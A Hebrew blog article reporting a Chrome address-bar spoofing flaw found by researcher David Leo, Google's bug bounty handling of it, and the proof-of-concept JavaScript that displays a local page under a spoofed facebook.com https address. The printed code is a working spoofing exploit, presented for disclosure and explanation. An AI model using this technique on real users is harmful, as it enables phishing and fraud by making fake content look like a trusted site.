Chrome address spoofing

בחודש יוני האחרון, גילה חוקר אבטחת מידע בריטי, בשם David Leo פירצה המאפשרת לזייף תוכן תחת כל כתובת URL ואף להציג כתובות https עם תעודת SSL ירוקה בדפדפן Chrome – כאשר בפועל מוצג קובץ/אתר אחר לגמרי.

הוא כמובן מיהר לדווח במסגרת תוכנית ה-Bug Bounty של גוגל, אולם הם סרבו לשלם ולקבל את הבאג, בטענה כי לא מדובר בבאג משמעותי היות והיוזר אינו יכול לקיים אינטרקציה עם התוכן המזויף, כך שלא ניתן לנצל את הפגיעה לפישינג למשל.
לאחר חודש של דין ודברים, החליטו בגוגל שמדובר בבאג פוטנציאלי, על אף העובדה כי היוזר אינו יכול לקיים אינטרקציה עם התוכן המזוייף, עדיין ניתן לנצלו לרעה – למשל ע"י הצגת מספר טלפון מזויף הקורא לקורבן להתקשר ועוד.

נכון לכתיבת מאמר זה, הבאג עדיין פעיל וניתן לצפות בו כאן – Chrome address spoofing Demo

ומה קורה מאחורי הקלעים?

בדוגמה שלנו קיים לינק, שלחיצה עליו תקרא לפונקציה שהוגדרה מראש בקובץ js.

<a href="#" onclick="f()">Login with Facebook</a>

הפונקציה:

 function next() {
 w.location.replace('https://facebook.com/?'+n);
 n++;

 setTimeout("next();",15);
 setTimeout("next();",25);
 }

 function f() {
 w = window.open("content.html", "_blank", "width=500 height=500");
 i = setInterval("try { x = w.location.href; } catch(e) { clearInterval(i); n = 0; next(); }", 5);
 }

מה שיוצג לקורבן בפועל זה בעצם הקובץ content.html תחת כתובת ה-URL שבדוגמה שלנו, שייך לפייסבוק.

אגב- אם תשימו לב זה מקפיץ את ה-CPU בכמעט 50% ומוביל לתקיעת הדפדפן.

ואם תהיתם לגבי לאו, זוהי לא הפעם הראשונה שהוא מוצא באגים בדפדפנים השונים. מוקדם יותר השנה, הוא דיווח על UXSS בדפדפן שאתם כ"כ אוהבים (בציניות כמובן) Internet Explorer וכן Address Bar Spoofing ב-Safari

(47)

הגב לכתבה דרך הפייסבוק:

נהנים מהתכנים? מילה טובה תעודד אותי להמשיך לכתוב

האימייל לא יוצג באתר. שדות החובה מסומנים *